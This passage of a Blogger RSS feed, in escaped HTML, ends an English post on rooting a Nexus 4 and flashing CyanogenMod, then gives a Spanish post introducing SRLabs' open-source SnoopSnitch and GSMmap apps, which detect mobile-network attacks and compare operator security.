Toolkit,&amp;nbsp;&lt;/blockquote&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;b&gt;Select Device&lt;/b&gt;: Choose OCCAM-MAKO Android 5.0.1 - Build LRX22C&amp;nbsp;&amp;nbsp;&lt;/blockquote&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;3. Plug the USB of smartphone into the windows system&amp;nbsp;&lt;/blockquote&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;4. Press Restore/Upgrade/Downgrade button (next image)&lt;/blockquote&gt;&lt;div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-py91eX735uE/VSjs9xhCt6I/AAAAAAAAdZU/WqkAHHyHMuE/s1600/N4_tookkit_.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://3.bp.blogspot.com/-py91eX735uE/VSjs9xhCt6I/AAAAAAAAdZU/WqkAHHyHMuE/s1600/N4_tookkit_.png&quot; height=&quot;278&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Software donwload automatically from Internet ROM and install into you mobile, !! It&#39;s important choose correct device ¡¡¡ and this tool is only for Google Nexus 4 (Mako).&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-_EoeTMNYIZ4/VSosFc3wiQI/AAAAAAAAdZw/1ZQv7vp6JT0/s1600/N4_tookkit_4.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://4.bp.blogspot.com/-_EoeTMNYIZ4/VSosFc3wiQI/AAAAAAAAdZw/1ZQv7vp6JT0/s1600/N4_tookkit_4.png&quot; height=&quot;276&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;[ Custom ROM ]&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Now that you have rooted your phone and custom recovery , these two requirements, you can install custom ROM.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Install new ROM it&#39;s easy, only you can save the custom file rom downloaded into internal smartphone storage and restart into recovery mode, then you have install &quot;zip&quot; and reboot when all it&#39;s end.&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Example:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;table class=&quot;table table-bordered table-striped&quot; style=&quot;background-color: white; border-bottom-color: rgb(221, 221, 221); border-bottom-style: solid; border-radius: 4px; border-right-color: rgb(221, 221, 221); border-right-style: solid; border-spacing: 0px; border-top-color: rgb(221, 221, 221); border-top-style: solid; border-width: 1px 1px 1px 0px; color: #333333; font-family: &#39;Helvetica Neue&#39;, Helvetica, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 18px; max-width: 100%; width: 650px;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;background-color: whitesmoke; border-left-color: rgb(221, 221, 221); border-left-style: solid; border-left-width: 1px; border-top-color: rgb(221, 221, 221); border-top-style: solid; border-top-width: 1px; padding: 8px; vertical-align: top;&quot;&gt;&lt;a href=&quot;https://tickleservice.appspot.com/authorizedtickle?applicationId=ROM%20Manager&amp;amp;data.url=http://get.cm/get/jenkins/90767/cm-11-20141115-SNAPSHOT-M12-mako.zip&amp;amp;data.name=cm-11-20141115-SNAPSHOT-M12-mako.zip&amp;amp;failure_redirect=http://rommanager.appspot.com/webconnectfailure.html&amp;amp;success_redirect=http://rommanager.appspot.com/webconnectsuccess.html&quot; style=&quot;color: #0088cc; text-decoration: none;&quot;&gt;&lt;img alt=&quot;Send to ROMManager&quot; src=&quot;https://download.cyanogenmod.org/static/rommanager.png?v=08a17&quot; style=&quot;border: 0px; height: auto; vertical-align: middle;&quot; title=&quot;Send to ROManager&quot; /&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;b&gt;Direct Download&lt;/b&gt;:&amp;nbsp;&lt;a href=&quot;https://download.cyanogenmod.org/get/jenkins/90767/cm-11-20141115-SNAPSHOT-M12-mako.zip&quot; style=&quot;color: #0088cc; text-decoration: none;&quot;&gt;cm-11-20141115-SNAPSHOT-M12-mako.zip&lt;/a&gt;&lt;br /&gt;&lt;small class=&quot;md5&quot; style=&quot;font-size: 10.3999996185303px;&quot;&gt;md5sum: 926e5115a2ec71fd3a01e1390686f5cd &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Short URL:&amp;nbsp;&lt;a href=&quot;http://get.cm/get/ldZ&quot; style=&quot;color: #0088cc; text-decoration: none;&quot;&gt;http://get.cm/get/ldZ&lt;/a&gt;&lt;/small&gt;&lt;/td&gt;&lt;td style=&quot;background-color: whitesmoke; border-left-color: rgb(221, 221, 221); border-left-style: solid; border-left-width: 1px; border-top-color: rgb(221, 221, 221); border-top-style: solid; border-top-width: 1px; padding: 8px; vertical-align: top;&quot;&gt;224.75 MB&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;Note:&lt;/b&gt; You must enabled again &quot;USB Debbuging options&quot; once you had installed a new ROM, even if new ROM haven&#39;t root access, you must do the &quot;root process&quot; again.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;I recommend install AFWall+ &lt;/b&gt;(Android Firewall based on IPtables) so you can control the network traffic flow in your device and help you to protect you against any authorized connection.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://play.google.com/store/apps/details?id=dev.ukanth.ufirewall&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://1.bp.blogspot.com/-8VdGJNGm_HA/VSo1HIxb0XI/AAAAAAAAdaU/obmPZquHydk/s1600/Root_AFwall_ST2labs.png&quot; height=&quot;182&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;#ST2Labs&lt;br /&gt;#Nexus4&lt;br /&gt;#Android&lt;br /&gt;#Security&lt;/div&gt;</description><link>http://www.seguridadparatodos.es/2015/04/rooting-my-nexus-4-with-android-501.html</link><author>noreply@blogger.com (Julian J. Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-wRj2G3_pVe8/VSo24iGWGWI/AAAAAAAAdag/UBkvFbnpuOc/s72-c/ST2_Rooting_head.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-8718212389763955160</guid><pubDate>Fri, 10 Apr 2015 13:10:00 +0000</pubDate><atom:updated>2015-04-10T16:38:19.695+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">31C</category><category domain="http://www.blogger.com/atom/ns#">3G</category><category domain="http://www.blogger.com/atom/ns#">Android</category><category domain="http://www.blogger.com/atom/ns#">Congress</category><category domain="http://www.blogger.com/atom/ns#">Defensa</category><category domain="http://www.blogger.com/atom/ns#">GSM</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Map</category><category domain="http://www.blogger.com/atom/ns#">Mobile</category><category domain="http://www.blogger.com/atom/ns#">Security</category><title>GSMmap &amp; Snoopsnitch: Android App to Mobile Self-Defense</title><description>&lt;a href=&quot;http://4.bp.blogspot.com/-2OrEh-j1-Ak/VSeG_y1abtI/AAAAAAAAdXw/exmbI_9_8yY/s1600/Mobile_ST2_Head.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://4.bp.blogspot.com/-2OrEh-j1-Ak/VSeG_y1abtI/AAAAAAAAdXw/exmbI_9_8yY/s1600/Mobile_ST2_Head.png&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Hace ya un tiempo que os hable en mi charla sobre [In]Seguridad en Redes Móviles, en dicha charla os comentaba las debilidades / vulnerabilidades que existen en las redes móviles GSM/3G.&amp;nbsp;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;El año pasado en diciembre de 2014, durante el congreso del &lt;a href=&quot;http://events.ccc.de/congress/2014/wiki/Static:Main_Page&quot; target=&quot;_blank&quot;&gt;Chaos Computer Club&lt;/a&gt;, los investigadores de &lt;a href=&quot;https://srlabs.de/&quot; target=&quot;_blank&quot;&gt;Security ReseachLabs&lt;/a&gt; &lt;b&gt;han publicado una vez más las debilidades existentes&lt;/b&gt; en las redes móviles actuales, y además, han creado un par de proyectos software libre, el primero para alertar y mostrar la inseguridad / vulnerabilidades de las redes móviles en los operadores actuales, y el segundo, una herramienta orientada a la protección , donde se monitoriza la red móvil para alertar y advertir de ataques en la red de tu operador.&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;[ Mobile Self-Defense / SnoopsNitch ]&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;a href=&quot;https://srlabs.de/&quot; target=&quot;_blank&quot;&gt;Srlabs&lt;/a&gt; ha creado y puesto a disposición de todo el mundo (proyecto OpenSource) una aplicación para móviles Android, llamada &lt;a href=&quot;https://opensource.srlabs.de/projects/snoopsnitch&quot; target=&quot;_blank&quot;&gt;snoopsnitch&lt;/a&gt;, que permite analizar la seguridad de la red móvil de tu operador de telefonía, y detectar algunos de las amenazas existentes, como estaciones base (BTS) falsa que capturan el IMSI, seguimiento de usuarios (Tracking) &amp;nbsp;y actualizaciones silenciosas, etc.&lt;/div&gt;&lt;br /&gt;Además, se puede utilizar la aplicación SnoopSnitch para colaborar en el proyecto open source que muestra y compara la seguridad que existe entre las redes móviles de los operadores de telefonía móvil, este proyecto es&amp;nbsp;http://gsmmap.org/.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/ovUoaLp8FpQPQcQRc7N7DYcGdVUWGi7iCOdJLBx9jWVjHCXKxZ3-XZHspu5hamdztA=h900-rw&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://4.bp.blogspot.com/ovUoaLp8FpQPQcQRc7N7DYcGdVUWGi7iCOdJLBx9jWVjHCXKxZ3-XZHspu5hamdztA=h900-rw&quot; height=&quot;320&quot; width=&quot;179&quot; /&gt;&lt;/a&gt;&lt;a href=&quot;http://2.bp.blogspot.com/jNoivsBx0jVSF-NdwhNN_QWqvNFkaKyj-NgtQVqPnzZR6tsxVcs5MNrFX3Y4VgD9tbo=h900-rw&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/jNoivsBx0jVSF-NdwhNN_QWqvNFkaKyj-NgtQVqPnzZR6tsxVcs5MNrFX3Y4VgD9tbo=h900-rw&quot; height=&quot;320&quot; width=&quot;179&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;Requisitos&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Para poder ejecutar y que funcione la aplicación en el móvil se deben de cumplir los siguientes requisitos:&lt;/div&gt;&lt;ul style=&quot;background-color: white; color: #333333; font-family: Verdana, sans-serif; font-size: 12px; line-height: 16.7999992370605px; margin-bottom: 1em;&quot;&gt;&lt;li style=&quot;text-align: left;&quot;&gt;Qualcomm-based Android phone (see&amp;nbsp;&lt;a class=&quot;wiki-page&quot; href=&quot;https://opensource.srlabs.de/projects/snoopsnitch/wiki/DeviceList&quot; style=&quot;color: #4183c4; text-decoration: none;&quot;&gt;device list&lt;/a&gt;)&lt;/li&gt;&lt;li&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;strong style=&quot;line-height: 16.7999992370605px;&quot;&gt;Stock&lt;/strong&gt;&lt;span style=&quot;line-height: 16.7999992370605px;&quot;&gt;&amp;nbsp;Android ROM, version 4.1 or later&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;line-height: 16.7999992370605px;&quot;&gt;Note: Custom Android ROMs like CyanogenMod may or may not work, depending on the availability of a Qualcomm DIAG kernel driver (DIAG_CHAR).&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style=&quot;text-align: left;&quot;&gt;&lt;strong&gt;Root privileges&lt;/strong&gt;&amp;nbsp;on phone&lt;/li&gt;&lt;/ul&gt;&lt;span style=&quot;background-color: white; color: #333333; font-family: &#39;Trebuchet MS&#39;, Verdana, sans-serif; font-size: 14px; line-height: 16.7999992370605px;&quot;&gt;Lista completa de compatibilidad de dispositivos:&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;https://opensource.srlabs.de/projects/snoopsnitch/wiki/DeviceList&quot; style=&quot;background-color: white; font-family: &#39;Trebuchet MS&#39;, Verdana, sans-serif; font-size: 14px; line-height: 16.7999992370605px;&quot;&gt;https://opensource.srlabs.de/projects/snoopsnitch/wiki/DeviceList&lt;/a&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;div&gt;&lt;/div&gt;&lt;div&gt;&lt;table style=&quot;background-color: white; border-collapse: collapse; border: 1px solid rgb(187, 187, 187); color: #333333; font-family: Verdana, sans-serif; font-size: 12px; line-height: 16.7999992370605px; margin-bottom: 1em; padding: 4px;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;border: 1px solid rgb(187, 187, 187); padding: 4px;&quot;&gt;G&lt;/td&gt;&lt;td style=&quot;border: 1px solid rgb(187, 187, 187); padding: 4px;&quot;&gt;Nexus 4 / Mako&lt;/td&gt;&lt;td style=&quot;border: 1px solid rgb(187, 187, 187); padding: 4px;&quot;&gt;LG-E960&lt;/td&gt;&lt;td style=&quot;border: 1px solid rgb(187, 187, 187); padding: 4px;&quot;&gt;CyanogenMod 11-20141115-SNAPSHOT-M12-mako or&amp;nbsp;&lt;strong style=&quot;background-image: url(https://opensource.srlabs.de/images/external.png); background-position: 0% 60%; background-repeat: no-repeat; color: #4183c4; padding-left: 12px;&quot;&gt;&lt;a class=&quot;external&quot; href=&quot;http://forum.xda-developers.com/google-nexus-5/general/radio-enable-lte-band-3-nexus-5-d820-t2928561&quot; style=&quot;background-image: url(https://opensource.srlabs.de/images/external.png); background-position: 0% 60%; background-repeat: no-repeat; color: #4183c4; padding-left: 12px; text-decoration: none;&quot;&gt;special kernel&lt;/a&gt;&lt;/strong&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;h3 style=&quot;background-color: white; border-bottom-width: 0px; color: #333333; font-family: &#39;Trebuchet MS&#39;, Verdana, sans-serif; font-size: 14px; margin: 0px 0px 10px; padding: 2px 10px 1px 0px;&quot;&gt;&lt;div style=&quot;color: black; font-family: &#39;Times New Roman&#39;; font-size: medium; font-weight: normal;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;Para los poseedores de un Nexus 4 se necesita una ROM Cynogen con un Kernel modificado. Esto entra en mi lista de TO-DO!&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: black; font-family: &#39;Times New Roman&#39;; font-size: medium; font-weight: normal;&quot;&gt;&lt;table style=&quot;border-collapse: collapse; border: 1px solid rgb(187, 187, 187); color: #333333; font-family: Verdana, sans-serif; font-size: 12px; line-height: 16.7999992370605px; margin-bottom: 1em; padding: 4px;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;/h3&gt;&lt;h3 style=&quot;background-color: white; border-bottom-width: 0px; color: #333333; font-family: &#39;Trebuchet MS&#39;, Verdana, sans-serif; font-size: 14px; margin: 0px 0px 10px; padding: 2px 10px 1px 0px;&quot;&gt;Incompatible Devices:&lt;/h3&gt;&lt;div style=&quot;background-color: white; color: #333333; font-family: Verdana, sans-serif; font-size: 12px; line-height: 16.7999992370605px;&quot;&gt;The following devices have been found to be incompatible and can&amp;nbsp;&lt;strong&gt;not&lt;/strong&gt;&amp;nbsp;be used with SnoopSnitch:&lt;/div&gt;&lt;ul style=&quot;background-color: white; color: #333333; font-family: Verdana, sans-serif; font-size: 12px; line-height: 16.7999992370605px; margin-bottom: 1em;&quot;&gt;&lt;li&gt;&lt;strong&gt;Unsupported.&lt;/strong&gt;&amp;nbsp;Devices with custom ROM such as CyanogenMod which lacks the Qualcomm DIAG kernel driver (DIAG_CHAR)&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Unsupported.&lt;/strong&gt;&amp;nbsp;Every device without Qualcomm chipset&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Unsupported.&lt;/strong&gt;&amp;nbsp;Samsung Galaxy S2 &amp;amp; S3&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Unsupported.&lt;/strong&gt;&amp;nbsp;Nexus 5 with stock Android&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Unsupported.&lt;/strong&gt;&amp;nbsp;Huawei Ascend Y300&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;span style=&quot;background-color: white; color: #333333; font-family: &#39;Trebuchet MS&#39;, Verdana, sans-serif; font-size: 14px;&quot;&gt;&lt;b&gt;Download:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;ul style=&quot;background-color: white; color: #333333; font-family: Verdana, sans-serif; font-size: 12px; line-height: 16.7999992370605px; margin-bottom: 1em;&quot;&gt;&lt;li&gt;&lt;a class=&quot;external&quot; href=&quot;https://opensource.srlabs.de/attachments/download/110/SnoopSnitch-0.9.5.apk&quot; style=&quot;background-image: url(https://opensource.srlabs.de/images/external.png); background-position: 0% 60%; background-repeat: no-repeat; color: #4183c4; padding-left: 12px; text-decoration: none;&quot;&gt;Pre-compiled .apk&lt;/a&gt;&amp;nbsp;(SHA1: 58a4083ed6d50cf2a3de833233b42a0df6dc19e9)&lt;/li&gt;&lt;li&gt;&lt;a class=&quot;external&quot; href=&quot;https://play.google.com/store/apps/details?id=de.srlabs.snoopsnitch&quot; style=&quot;background-image: url(https://opensource.srlabs.de/images/external.png); background-position: 0% 60%; background-repeat: no-repeat; color: #4183c4; padding-left: 12px; text-decoration: none;&quot;&gt;Pre-compiled .apk from Google Play Store&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a class=&quot;external&quot; href=&quot;https://f-droid.org/repository/browse/?fdid=de.srlabs.snoopsnitch&quot; style=&quot;background-image: url(https://opensource.srlabs.de/images/external.png); background-position: 0% 60%; background-repeat: no-repeat; color: #4183c4; padding-left: 12px; text-decoration: none;&quot;&gt;Pre-compiled .apk from F-Droid&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Source Code:&lt;pre style=&quot;background-color: #fafafa; border-radius: 3px; border: 1px solid rgb(226, 226, 226); margin: 1em 1em 1em 1.6em; overflow-x: auto; overflow-y: hidden; padding: 8px; width: auto;&quot;&gt;git clone --recursive https://opensource.srlabs.de/git/snoopsnitch.git&lt;/pre&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div style=&quot;background-color: white; color: #333333; font-family: Verdana, sans-serif; font-size: 12px; line-height: 16.7999992370605px;&quot;&gt;SnoopSnitch is released under the GPL v3 license (cf.&amp;nbsp;&lt;a class=&quot;source&quot; href=&quot;https://opensource.srlabs.de/projects/snoopsnitch/repository/entry/COPYING&quot; style=&quot;color: #4183c4; text-decoration: none;&quot;&gt;source:COPYING&lt;/a&gt;). The app is known to built under Linux and OS X, see&amp;nbsp;&lt;a class=&quot;source&quot; href=&quot;https://opensource.srlabs.de/projects/snoopsnitch/repository/entry/README&quot; style=&quot;color: #4183c4; text-decoration: none;&quot;&gt;source:README&lt;/a&gt;&amp;nbsp;for build instructions.&lt;/div&gt;&lt;div style=&quot;background-color: white; color: #333333; font-family: Verdana, sans-serif; font-size: 12px; line-height: 16.7999992370605px;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;[ GSMmap]&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;background-color: rgba(255, 255, 255, 0.952941); color: #333333; font-family: &#39;Helvetica Neue&#39;, Helvetica, Arial, sans-serif; line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span style=&quot;background-color: rgba(255, 255, 255, 0.952941); color: #333333; font-family: &#39;Helvetica Neue&#39;, Helvetica, Arial, sans-serif; line-height: 20px;&quot;&gt;GSM Security Map compares the protection capabilities of mobile networks&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Se observa que en España hay muy pocos usuarios contribuyendo a este proyecto, lo que implica escasos datos para el análisis, sin embargo, en Alemania, existen una gran cantidad de usuarios aportando datos al proyecto.&lt;/div&gt;&lt;br /&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-p9X2pN4GQRA/VSeRV_lOVnI/AAAAAAAAdYI/X0Kwn1xm04A/s1600/Mobile_ST2_gsmap_3.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://4.bp.blogspot.com/-p9X2pN4GQRA/VSeRV_lOVnI/AAAAAAAAdYI/X0Kwn1xm04A/s1600/Mobile_ST2_gsmap_3.png&quot; height=&quot;320&quot; width=&quot;257&quot; /&gt;&lt;/a&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-GjtDOgQaoFE/VSeQvtJ9_LI/AAAAAAAAdYA/yM8ZE4eCWzc/s1600/Mobile_ST2_gsmap_!.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://4.bp.blogspot.com/-GjtDOgQaoFE/VSeQvtJ9_LI/AAAAAAAAdYA/yM8ZE4eCWzc/s1600/Mobile_ST2_gsmap_!.png&quot; height=&quot;320&quot; width=&quot;287&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Con los datos aportados, se analizan y se generan datos sobre la seguridad de las redes de los operadores de telefonía móvil. A continuación una captura de pantalla que se puede consultar en www.gsmmap.org sobre España y Alemania, respecto a la protección que ofrecen las operadoras móviles a ataques de interceptación de la comunicación.&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-1pnXlCMyZig/VSeURZZZ2VI/AAAAAAAAdYc/wqHlGIIDyrI/s1600/Mobile_ST2_gsmap_2.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://4.bp.blogspot.com/-1pnXlCMyZig/VSeURZZZ2VI/AAAAAAAAdYc/wqHlGIIDyrI/s1600/Mobile_ST2_gsmap_2.png&quot; height=&quot;286&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-_uIKDtgw4JM/VSeURe1-ZJI/AAAAAAAAdYY/dR8lpFv7_2M/s1600/Mobile_ST2_gsmap_4.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://4.bp.blogspot.com/-_uIKDtgw4JM/VSeURe1-ZJI/AAAAAAAAdYY/dR8lpFv7_2M/s1600/Mobile_ST2_gsmap_4.png&quot; height=&quot;293&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;En el caso de España, Vodafone y Movistar son las que más protección en redes 3G ofrecen, para ataques de interceptación de la comunicación. Sin embargo, Orange no sale tan bien parada en el analisis comparativo. No obstante, se debe de analizar el resultado de forma cauta, al verificar que no existen suficientes datos, es decir, hay pocos usuarios contribuyendo a este proyecto en España.&lt;/div&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Pero al menos, en mi opinión, es un dato muy interesante y una página WEB a tener en consideración si decides cambiar de operador móvil, un nuevo factor de decisión a incluir,y no solo valorar a la operadora por su tarifa / plan o velocidad de los datos.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Además, observar que solamente existen datos comparativos de redes GSM/3G, dado que el despliegue de la red 4G es muy joven, y dispone de mejores medidas de seguridad.&lt;/div&gt;&lt;br /&gt;&lt;u&gt;&lt;b&gt;Aplicación en Android&amp;nbsp;&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;&lt;br /&gt;https://play.google.com/store/apps/details?id=de.srlabs.gsmmap&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://www.imedicalapps.com/wp-content/uploads/2014/03/PDF.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://www.imedicalapps.com/wp-content/uploads/2014/03/PDF.png&quot; height=&quot;200&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;[ Transparencias / Slides ]&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Puedes consultar las transparencia de la presentación que ofreció Security ResearchLabs en el 31C Security Conference el pasado 30/12/2014.&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;https://events.ccc.de/congress/2014/Fahrplan/system/attachments/2493/original/Mobile_Self_Defense-Karsten_Nohl-31C3-v1.pdf&quot; target=&quot;_blank&quot;&gt;Slides&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;[&amp;nbsp;Vídeo de la Presentación&amp;nbsp;]&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;En el pasado &lt;a href=&quot;https://events.ccc.de/congress/2014/Fahrplan/events/6122.html&quot; target=&quot;_blank&quot;&gt;31C Chaos Computer Club Conference&lt;/a&gt; Security Research Labs presento su herramienta SnoopSnitch para demostrar la inseguridad que existe en los protocolos de telefonía móvil. En su charla demuestran lo &quot;barato&quot; que resulta interceptar las comunicaciones GSM/3G utilizando la debilidad del protocolo de señalización SS7.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;iframe allowfullscreen=&quot;&quot; class=&quot;YOUTUBE-iframe-video&quot; data-thumbnail-src=&quot;https://i.ytimg.com/vi/GeCkO0fWWqc/0.jpg&quot; frameborder=&quot;0&quot; height=&quot;266&quot; src=&quot;http://www.youtube.com/embed/GeCkO0fWWqc?feature=player_embedded&quot; width=&quot;320&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;br 